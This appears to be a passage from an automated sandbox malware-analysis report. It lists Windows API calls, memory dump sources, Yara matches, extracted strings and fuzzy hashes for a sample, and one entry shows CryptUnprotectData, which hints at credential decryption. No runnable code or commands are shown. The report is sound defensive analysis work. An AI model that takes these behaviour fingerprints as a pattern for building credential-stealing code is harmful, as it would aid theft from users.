                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00720DE8,00000000,?), ref: 00717B40
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00717B47
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00720DE8,00000000,?), ref: 00717B54
                                  • wsprintfA.USER32 ref: 00717B83
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: 8c0ca81ebe167fee052a97f5482d66cf2520f6ee313fd85cd85b4667a45c0aec
                                  • Instruction ID: 1f12827a265c99cb6b39748dd53e18cfac0e00f0e155c0d80df81012d9aac73a
                                  • Opcode Fuzzy Hash: 8c0ca81ebe167fee052a97f5482d66cf2520f6ee313fd85cd85b4667a45c0aec
                                  • Instruction Fuzzy Hash: 55112AB2959118ABCB14DBC9DD45BBEF7B8EB4CB11F10411AF615A2280E3395980D7B0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,011DE2C0,00000000,?,00720DF8,00000000,?,00000000,00000000), ref: 00717BF3
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00717BFA
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,011DE2C0,00000000,?,00720DF8,00000000,?,00000000,00000000,?), ref: 00717C0D
                                  • wsprintfA.USER32 ref: 00717C47
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: 4f99d0db8c17ed26d2f193eb92ff5f16d5103d6b1e31d98c5de4a6c6c739b301
                                  • Instruction ID: ac88118775b84927356fa28f8b4858c9129bffe7fb8c75b9d24f6f0eee43d26f
                                  • Opcode Fuzzy Hash: 4f99d0db8c17ed26d2f193eb92ff5f16d5103d6b1e31d98c5de4a6c6c739b301
                                  • Instruction Fuzzy Hash: 58118EB194A228EBEB248F58DC45FA9BB78FB44711F104796F619972D0D7781A80CB90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: 3kw$R*uc$t<^O
                                  • API String ID: 0-822228879
                                  • Opcode ID: 25917f04fb6c4d22af9bc6da877c95239e3d20c4ee08834cb39cb27230381e47
                                  • Instruction ID: 1644c2dbc1fc7d21dc4b25f25f70fe9c290327c0ed347cb954bf159544dc2eff
                                  • Opcode Fuzzy Hash: 25917f04fb6c4d22af9bc6da877c95239e3d20c4ee08834cb39cb27230381e47
                                  • Instruction Fuzzy Hash: 15B218F36082049FE3046E2DEC8577AFBE9EF94720F1A4A3DEAC5C7744E93558018696
                                  APIs
                                  • CoCreateInstance.COMBASE(0071E120,00000000,00000001,0071E110,00000000), ref: 007139A8
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00713A00
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: 70fbb54272226fe09c52165f7f964479e392d6fb28ac24edf6ff5315a6546a98
                                  • Instruction ID: 2c0af321f8fa7d59ccf1882d037102e77d013e1ea8c698153fbfba0ca9c97a95
                                  • Opcode Fuzzy Hash: 70fbb54272226fe09c52165f7f964479e392d6fb28ac24edf6ff5315a6546a98
                                  • Instruction Fuzzy Hash: 2941D970A40A289FDB24DB58CC95BDBB7B5AB48702F4082D9E618E72D0D7716EC5CF50
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0070A2D4
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 0070A2F3
                                  • LocalFree.KERNEL32(?), ref: 0070A323
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: 58e76001d1c023fd3f15f3a894c5fc68f6d9dab4c8c87f01e6fd1bdfe113c6ed
                                  • Instruction ID: ceaeb4d12db1011a41d81175271205044ce5db64a467a3bd2dda38a32bdb6901
                                  • Opcode Fuzzy Hash: 58e76001d1c023fd3f15f3a894c5fc68f6d9dab4c8c87f01e6fd1bdfe113c6ed
                                  • Instruction Fuzzy Hash: 4E11B7B8A05209EFCB04DFA4D985AAEB7B5FF89300F104559ED15A7390E734AE50CF61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: )@vS$ji~
                                  • API String ID: 0-4035643750
                                  • Opcode ID: 440e095871f1c83626ade83a6f38ad5443679545722ed2e4ebf1f94a9555d587
                                  • Instruction ID: 8d5f49df4d46bd969807afcff4cbf8a2f01f248913c0b85dc94bb10c914af610
                                  • Opcode Fuzzy Hash: 440e095871f1c83626ade83a6f38ad5443679545722ed2e4ebf1f94a9555d587
                                  • Instruction Fuzzy Hash: 15B216F3A08204AFD3046E2DEC8567AB7E9EF94720F1A493DEAC5C7744EA3558018797
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: aS_f$c;
                                  • API String ID: 0-2282223921
                                  • Opcode ID: bd9d14f9211895d937d91ad190e7fdd0cd12e9f6ce9ecb2f9fc53fe7195990da
                                  • Instruction ID: f858ae35771c773934c1141e3a5faaacd1a61b8ef0ef25ac4f1f7ae570a3d28c
                                  • Opcode Fuzzy Hash: bd9d14f9211895d937d91ad190e7fdd0cd12e9f6ce9ecb2f9fc53fe7195990da
                                  • Instruction Fuzzy Hash: AAB2F6F360C204AFE704AE2DEC8567ABBE9EFD4320F16893DE6C583744E63558058697
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ?$__ZN
                                  • API String ID: 0-1427190319
                                  • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                  • Instruction ID: c6270e7f5eb628bc4f51cdd7a4ed2b64c746f9f9b00d434c8b2b6dfa1bda7227
                                  • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                  • Instruction Fuzzy Hash: A0723672908B509BDB14CF24C88066AB7E2FFC5390F59CA1DF5999B291D3B8DC41DB81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: v|I$}K/~
                                  • API String ID: 0-1723024461
                                  • Opcode ID: 7d1df02061530650b11a61b51bf92ee531832a5e5a2b39241917f8ccf0ccd2cc
                                  • Instruction ID: 0422776b260735eed90a645eef6811b36463377079ede2fc36cedf5e0cd3071c
                                  • Opcode Fuzzy Hash: 7d1df02061530650b11a61b51bf92ee531832a5e5a2b39241917f8ccf0ccd2cc
                                  • Instruction Fuzzy Hash: 407119F3A182049BE3046E28DC4177ABBD5EB94720F1A463DEAC5D7384E53E68148787
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: xn--
                                  • API String ID: 0-2826155999
                                  • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                  • Instruction ID: 1598ea586edea179ef5836ec73be9d96872164c461659e49d5683461a3eb24f7
                                  • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                  • Instruction Fuzzy Hash: 20A236B1D002688AEF18CB68C8543EDB7B1FF55302F9842AADC5677281D7BD5E89CB50
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID:
                                  • API String ID: 3732870572-0
                                  • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                  • Instruction ID: bb4117d67d3c7c2920918235161c18e23a3f3856dccf8769437442ad83961152
                                  • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                  • Instruction Fuzzy Hash: 2EE1E1316087419FC724CF28C8917EEB7E2EF89305F49492DE8D997291D7759849CB82
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID:
                                  • API String ID: 3732870572-0
                                  • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                  • Instruction ID: 130dc5133b13c1f32e22baaea18158e53fd770904b54b974f24cc1e06bb1603f
                                  • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                  • Instruction Fuzzy Hash: B5E1D471A083019FCB24CF18C8817EEB7E6EFC4315F15892DE9899B251E774AC89CB46
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: UNC\
                                  • API String ID: 0-505053535
                                  • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                  • Instruction ID: 6efefd1c5068e0509166e4477f856c6b05853031cf55a512c9332c3f193a5c25
                                  • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                  • Instruction Fuzzy Hash: 0FE13E75D042658EEF10CF29C8843BEBFE2AB85314F198169DC965B292D73D8D45CBB0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: p?
                                  • API String ID: 0-293216770
                                  • Opcode ID: 0433165c5890f40ca9096ab9100c2786c475a3ff07c4486894b314ee0092b32e
                                  • Instruction ID: e61049976d054ee447648ae1b5cf0132d9397f40db40eaf65cbd83a66ed00829
                                  • Opcode Fuzzy Hash: 0433165c5890f40ca9096ab9100c2786c475a3ff07c4486894b314ee0092b32e
                                  • Instruction Fuzzy Hash: E16105F3A186049FE3157E29DC857BAF7E6EF94310F1A493CD6C483784EA3898448786
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
